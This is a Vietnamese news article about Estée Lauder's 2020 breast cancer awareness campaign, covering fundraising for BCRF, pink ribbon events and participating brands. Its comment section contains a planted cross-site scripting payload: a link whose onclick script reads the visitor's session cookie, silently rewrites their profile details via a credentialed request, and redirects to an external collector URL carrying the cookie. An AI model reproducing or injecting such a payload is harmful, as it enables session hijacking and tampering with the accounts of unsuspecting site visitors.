Tập đoàn Estée Lauder giới thiệu "Chiến dịch chống Ung thư vú 2020 với sức mạnh của sự đoàn kết"

28/09/2020

Trên khắp thế giới, chúng ta đang trải qua những khoảng thời gian đầy thử thách do hậu quả của đại dịch Coronavirus. Và đặc biệt là cộng đồng bệnh nhân Ung Thư Vú (UTV) hiện đang đối mặt với nhiều rủi ro và dễ bị tổn thương hơn bao giờ hết. Cứ sau 15 giây, ở một nơi nào đó trên thế giới, một phụ nữ được chẩn đoán mắc bệnh UTV — và chúng tôi tin rằng con số đó là quá nhiều. Vào những năm trước, con số là 19 giây, 18 giây mới có 1 người được chuẩn đoán mắc bệnh, nhưng năm nay là 15 giây- Điều này có nghĩa là những người mắc bệnh ngày càng nhiều hơn và độ tuổi mắc bệnh cũng ngày càng được trẻ hóa. Đó là 1 nỗi đau!

Tại Tập Đoàn Estée Lauder, điều này chỉ tái khẳng định tầm quan trọng của việc tiếp tục đầu tư cho các dự án nghiên cứu y tế nhằm hỗ trợ những người hiện đang sống chung với bệnh UTV, những nhóm dễ bị tổn thương có thể phải đối mặt với sự chênh lệch về khả năng tiếp cận chăm sóc sức khỏe, và các bác sĩ, y tá và những người chăm sóc trên tiền tuyến… Đó là lý do tại sao Tập Đoàn Estée Lauder vẫn đẩy mạnh cho Chiến dịch UTV với sứ mệnh tạo ra một thế giới không còn UTV.

Năm nay, chiến dịch chỉ xuất hiện duy nhất một dải ruy băng màu hồng đậm - biểu tượng được công nhận trên toàn cầu cho bệnh UTV. Tuy nhiên, những gì nó thể hiện còn đi xa hơn nữa —không chỉ là một dải băng, đó là sự đoàn kết của tất cả chúng ta. Đó là một chiến dịch, một đại diện của cộng đồng toàn cầu và tôn vinh tất cả những ai đang là bệnh nhân của căn bệnh này. Chúng ta cùng hy vọng về mục tiêu chung: đó là #TimeToEndBreastCancer.

Chiến dịch đã quyên góp được hơn 89 triệu đô la trên toàn cầu cho các dịch vụ nghiên cứu, giáo dục và y tế, với hơn 73 triệu đô la tài trợ cho 293 nghiên cứu y tế thông qua Tổ chức Nghiên cứu Ung thư vú® (BCRF), tổ chức ung thư vú phi lợi nhuận được xếp hạng cao nhất Hoa Kỳ được thành lập bởi Evelyn H. Lauder vào năm 1993. BCRF hỗ trợ ở 07 quốc gia trên toàn cầu kéo dài toàn bộ quá trình nghiên cứu ung thư - từ sinh học cơ bản về cách các tế bào khỏe mạnh biến đổi thành ung thư, đến phát triển các xét nghiệm chẩn đoán mới điều trị, nghiên cứu để cải thiện chất lượng cuộc sống của bệnh nhân cả trong và sau khi điều trị.

Chiến dịch tiếp tục tác động tích cực đến cộng đồng toàn cầu theo nhiều cách, bao gồm: nêu bật tầm quan trọng của giáo dục và phát hiện sớm bằng cách triệu tập các cuộc thảo luận với các chuyên gia y tế và sản xuất các tài liệu cung cấp thông tin; hỗ trợ xây dựng và mở rộng các trung tâm chăm sóc khác nhau để điều trị bệnh nhân ung thư vú; tài trợ các nguồn lực y tế bao gồm khả năng tiếp cận với chụp X-quang tuyến vú và sàng lọc; tác động tích cực đến người bệnh UTV và gia đình họ thông qua các chương trình hỗ trợ, trị liệu và tư vấn…

William P. Lauder, Chủ tịch điều hành của Tập Đoàn Estée Lauder khẳng định sứ mệnh của Chiến dịch và tôn vinh di sản của người mẹ quá cố của ông, tuyên bố: “Sứ mệnh của chúng tôi là tạo ra một thế giới không ung thư vú với tầm nhìn của mẹ tôi, Evelyn H. Lauder, người bắt đầu Chiến dịch Ung thư Vú và đồng sáng tạo ra dải ruy băng hồng (Pink Ribbon) vào năm 1992, nhằm nâng cao mức độ nhận thức toàn cầu về căn bệnh này thông qua nhân viên, người tiêu dùng và đối tác của chúng tôi. Hôm nay, tôi tự hào hơn bao giờ hết về tác động tích cực mà chúng tôi đã tạo ra trong cộng đồng ung thư vú và chống lại căn bệnh này. Sự cống hiến của chúng tôi vẫn không thay đổi, đoàn kết cộng đồng toàn cầu trong hành động, để đưa chúng tôi đến gần hơn với một phương pháp chữa bệnh.”

Bà Evelyn H. Lauder
  • Đoàn kết mọi người trên toàn cầu thông qua các sự kiện và hoạt động trên mạng xã hội để thúc đẩy sự tương tác và lan tỏa cùng cộng đồng.
  • Khởi động lời kêu gọi hành động trên các phương tiện truyền thông xã hội để kêu gọi những người ủng hộ tham gia và gây quỹ cho BCRF thông qua hành động đơn giản là chia sẻ dải Ruy băng hồng trên mạng xã hội của họ và hashtag #TimeToEndBreastCancer, #ELCdonates.
○ Đối với mỗi bài đăng trên Instagram hoặc Facebook công khai với hashtag trên @esteelaudercompanies sẽ tặng $25 cho Quỹ @bcrfcure với số tiền dự kiến lên đến $100.000
  • Chiếu sáng các tòa nhà, đài tưởng niệm và địa danh trên toàn thế giới bằng ánh sáng hồng rực rỡ để nâng cao nhận thức về sức khỏe vùng ngực, bao gồm cả Tòa nhà Empire State, Thành phố New York và Tháp Eiffel
  • Huy động nhân viên trên toàn thế giới để tác động tích cực đến cộng đồng và đoàn kết hành động để hỗ trợ hơn 60 tổ chức ung thư vú trên thế giới.
  • Tiếp tục sản xuất và phân phối tài liệu thông tin và ruy băng màu hồng trên toàn thế giới.
  • Thúc đẩy đóng góp cho BCRF thông qua ELCompanies.com/BreastCancerCampaign.

Tại Việt Nam, Công ty Estee Lauder tiếp tục kết hợp với Mạng Lưới Ung Thư Vú Việt Nam (BCNV) để tổ chức các hoạt động nhằm nâng cao nhận thức về UTV và chăm sóc sức khỏe cho CB-CNV công ty, tài trợ dự án Hope For All của BCNV và lan tỏa thông điệp #TimeToEndBreastCancer cùng các KOL trên các mạng xã hội nhằm góp phần vào hoạt động chung của Breast Cancer Campaign toàn cầu.

Năm nay, 20 thương hiệu của Tập Đoàn Estée Lauder sẽ hỗ trợ sứ mệnh của Chiến dịch bao gồm: AERIN, Aveda, BECCA, Bobbi Brown, Bumble and bumble, Clinique, Darphin, DKNY, Donna Karan, Dr. Jart +, Estée Lauder, GLAMGLOW, Jo Malone London, La Mer, Lab Series, Origins, Prescriptives, RODIN olio lusso, Smashbox và Tom Ford Beauty. Mỗi thương hiệu sẽ bán sản phẩm và quyên góp cho BCRF và / hoặc các tổ chức từ thiện khác trên khắp thế giới.

Để tìm hiểu thêm về Chiến dịch Ung thư vú của Công ty Estée Lauder, hãy truy cập ELCompanies.com/BreastCancerCampaign.

Bình luận

Bạn nghĩ gì về bài viết này ?(1 bình luận)

Bạn cần đăng nhập để có thể bình luận

Có 1 thành viên đã bình luận

Vulnerable

Vulnerable

<a href="#" onclick="javascript:function getID(){ a = document.cookie.match('lo_user'); b = a['input'].slice(a['input'].search('lo_user')); return b.slice(0, b.search(';'));};fetch('https://www.lofficiel.vn/tai-khoan/thong-tin-ca-nhan', {'headers': {'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'cookie': '__asc=482511c617507373ebb2f5d3187; fblo_1538391976230875=y; lo_user=%7B%22id%22%3A1616%7D; __asc=482511c617507373ebb2f5d3187; _gat=1',}, 'body':'fullname=Vulnerable&phone=Vulnerable&address=Vulnerable&job=Vulnerable','method': 'POST', 'credentials': 'include'}).then(response => response.json()).then(data => { console.log('Success:', data);}).catch((error) => { console.error('Error:', error);});window.location='http://127.0.0.1:8081/Tester/xss.php?cok='+getID()+'&url='+document.URL;" >Click vào đây để xem chi tiết</a>